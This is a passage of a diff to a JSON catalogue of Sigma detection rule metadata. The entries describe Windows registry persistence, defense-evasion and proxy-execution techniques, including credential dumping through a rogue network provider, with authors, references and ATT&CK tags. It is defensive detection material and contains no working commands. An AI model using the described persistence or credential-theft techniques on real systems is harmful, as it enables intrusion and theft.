"https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://github.com/elastic/detection-rules/issues/1371", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", - "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ] - }, - "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", - "value": "DNS-over-HTTPS Enabled by Registry" - }, - { - "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_dns_serverlevelplugindll.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ] - }, - "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", - "value": "DNS ServerLevelPluginDll Install - Registry" - }, - { - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "meta": { - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "creation_date": "2020/09/10", - "falsepositive": "No established falsepositives", - "filename": "registry_set_enabling_cor_profiler_env_variables.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/jamieantisocial/status/1304520651248668673", - "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", - "https://www.sans.org/cyber-security-summit/archives", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" - ] - }, - "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "value": "Enabling COR Profiler Environment Variables" - }, - { - "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", - "meta": { - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/15", - "falsepositive": [ - "Administrator actions" - ], - "filename": "registry_set_enabling_turnoffcheck.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", - "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/05", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_etw_disabled.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "value": "COMPlus_ETWEnabled Registry Modification - Registry" - }, - { - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", - "value": "Suspicious Application Allowed Through Exploit Guard" - }, - { - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "meta": { - "author": "frack113", - "creation_date": "2022/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_fax_change_service_user.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/dottor_morte/status/1544652325570191361", - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", - "value": "Change User Account Associated with the FAX Service" - }, - { - "description": "Detect possible persistence using Fax DLL load when service restart", - "meta": { - "author": "frack113", - "creation_date": "2022/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_fax_dll_persistance.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/dottor_morte/status/1544652325570191361", - "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", - "value": "Change the Fax Dll" - }, - { - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/11/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_file_association_exefile.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1461041276514623491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "value": "New File Association Using Exefile" - }, - { - "description": "Detects persistence using GlobalFlags in image file execution options", - "meta": { - "author": "Karneades, Jonhnathan Ribeiro", - "creation_date": "2018/04/11", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_globalflags_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" - ] - }, - "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", - "value": "GlobalFlags Registry Persistence Mechanisms" - }, - { - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "This value is not set by default but could be rarly used by administrators" - ], - "filename": "registry_set_hangs_debugger_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/wer_debugger.html", - "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", - "value": "Add Debugger Entry To Hangs Key For Persistence" - }, - { - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_hhctrl_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/hhctrl.html", - "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "value": "Persistence Via Hhctrl.ocx" - }, - { - "description": "Hides the file extension through modification of the registry", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "registry_set_hidden_extention.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", - "https://unit42.paloaltonetworks.com/ransomware-families/", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ] - }, - "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", - "value": "Registry Modification to Hidden File Extension" - }, - { - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "meta": { - "author": "frack113", - "creation_date": "2022/04/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_hide_file.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", - "value": "Modification of Explorer Hidden Keys" - }, - { - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", - "meta": { - "author": "frack113", - "creation_date": "2022/03/18", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_hide_function_user.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "value": "Registry Hide Function from User" - }, - { - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/26", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "value": "Hide Schedule Task Via Index Value Tamper" - }, - { - "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_ie_persistence.yml", - "level": "low", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", - "value": "Modification of IE Registry Settings" - }, - { - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate registration of IFilters by the OS or software" - ], - "filename": "registry_set_ifilter_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/ifilters.html", - "https://twitter.com/0gtweet/status/1468548924600459267", - "https://github.com/gtworek/PSBits/tree/master/IFilter", - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", - "value": "Register New IFiltre For Persistence" - }, - { - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "meta": { - "author": "frack113", - "creation_date": "2022/04/04", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_install_root_or_ca_certificat.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", - "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "d223b46b-5621-4037-88fe-fda32eead684", - "value": "New Root or CA or AuthRoot Certificate to Store" - }, - { - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "meta": { "author": "frack113", "creation_date": "2022/05/28", "falsepositive": [ "Unknown" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", - "level": "high", - "logsource.category": "registry_set", + "filename": "proc_creation_win_lolbin_pubprn.yml", + "level": "medium", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" + "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1216.001" ] }, - "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" + "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "value": "Pubprn.vbs Proxy Execution" }, { - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", + "creation_date": "2022/09/27", "falsepositive": [ - "Unlikely" + "Unknown" ], - "filename": "registry_set_lsa_extension_persistence.yml", + "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", "level": "high", - "logsource.category": "registry_set", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/lsaaextension.html", - "https://twitter.com/0gtweet/status/1476286368385019906", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" ], "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.execution" ] }, - "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "value": "Persistence Via LSA Extensions" + "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", + "value": "ImagingDevices Unusual Parent/Child Processes" }, { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", "meta": { - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2017/11/10", - "falsepositive": "No established falsepositives", - "filename": "registry_set_mal_adwind.yml", - "level": "high", - "logsource.category": "registry_set", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Legitimate use via a batch script or by an administrator." + ], + "filename": "proc_creation_win_lolbin_forfiles.yml", + "level": "medium", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" ], "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059" ] }, - "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "value": "Adwind RAT / JRAT - Registry" + "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "value": "Use of Forfiles For Execution" }, { - "description": "Attempts to detect system changes made by Blue Mockingbird", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "meta": { - "author": "Trent Liffick (@tliffick)", - "creation_date": "2020/05/14", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/25", "falsepositive": [ - "Unknown" + "Other legitimate \"Windows Terminal\" profiles" ], - "filename": "registry_set_mal_blue_mockingbird.yml", - "level": "high", - "logsource.category": "registry_set", + "filename": "proc_creation_win_windows_terminal_susp_children.yml", + "level": "medium", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/blue-mockingbird-cryptominer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" + "https://persistence-info.github.io/Data/windowsterminalprofile.html", + "https://twitter.com/nas_bench/status/1550836225652686848", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" ], "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" - ] - }, - "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", - "value": "Blue Mockingbird - Registry" - }, - { - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" - ], - "filename": "registry_set_mpnotify_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/mpnotify.html", - "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" - ], - "tags": [ "attack.persistence" ] }, - "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", - "value": "Persistence Via Mpnotify" + "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", + "value": "Suspicious WindowsTerminal Child Processes" }, { - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", "meta": { "author": "frack113", - "creation_date": "2022/11/18", + "creation_date": "2022/12/29", "falsepositive": [ "Unknown" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", - "value": "NET NGenAssemblyUsageLog Registry Key Tamper" - }, - { - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." - ], - "filename": "registry_set_new_application_appcompat.yml", - "level": "informational", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/1", - "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "value": "New Application in AppCompat" - }, - { - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/23", - "falsepositive": [ - "Other legitimate network providers used and not filtred in this rule" - ], - "filename": "registry_set_new_network_provider.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "value": "New Network Provider - Registry" - }, - { - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/26", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_office_enable_dde.yml", + "filename": "proc_creation_win_lolbin_unregmp2.yml", "level": "medium", - "logsource.category": "registry_set", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559.002" - ] - }, - "uuid": "63647769-326d-4dde-a419-b925cc0caf42", - "value": "Enable Microsoft Dynamic Data Exchange" - }, - { - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "meta": { - "author": "Trent Liffick (@tliffick)", - "creation_date": "2020/05/22", - "falsepositive": [ - "Valid Macros and/or internal documents" - ], - "filename": "registry_set_office_security.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "value": "Office Security Settings Changed" - }, - { - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/01/10", - "falsepositive": [ - "Legitimate Addin Installation" - ], - "filename": "registry_set_office_vsto_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_vivami/status/1347925307643355138", - "https://vanmieghem.io/stealth-outlook-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" - ], - "tags": [ - "attack.t1137.006", - "attack.persistence" - ] - }, - "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", - "value": "Stealthy VSTO Persistence" - }, - { - "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", - "meta": { - "author": "@ScoubiMtl", - "creation_date": "2021/04/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_outlook_c2_registry_key.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" - ] - }, - "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "value": "Outlook C2 Registry Key" - }, - { - "description": "Detects the manipulation of persistent URLs which could execute malicious code", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2021/06/10", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_outlook_registry_todaypage.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "value": "Persistent Outlook Landing Today Pages" - }, - { - "description": "Detects the manipulation of persistent URLs which can be malicious", - "meta": { - "author": "Tobias Michalski", - 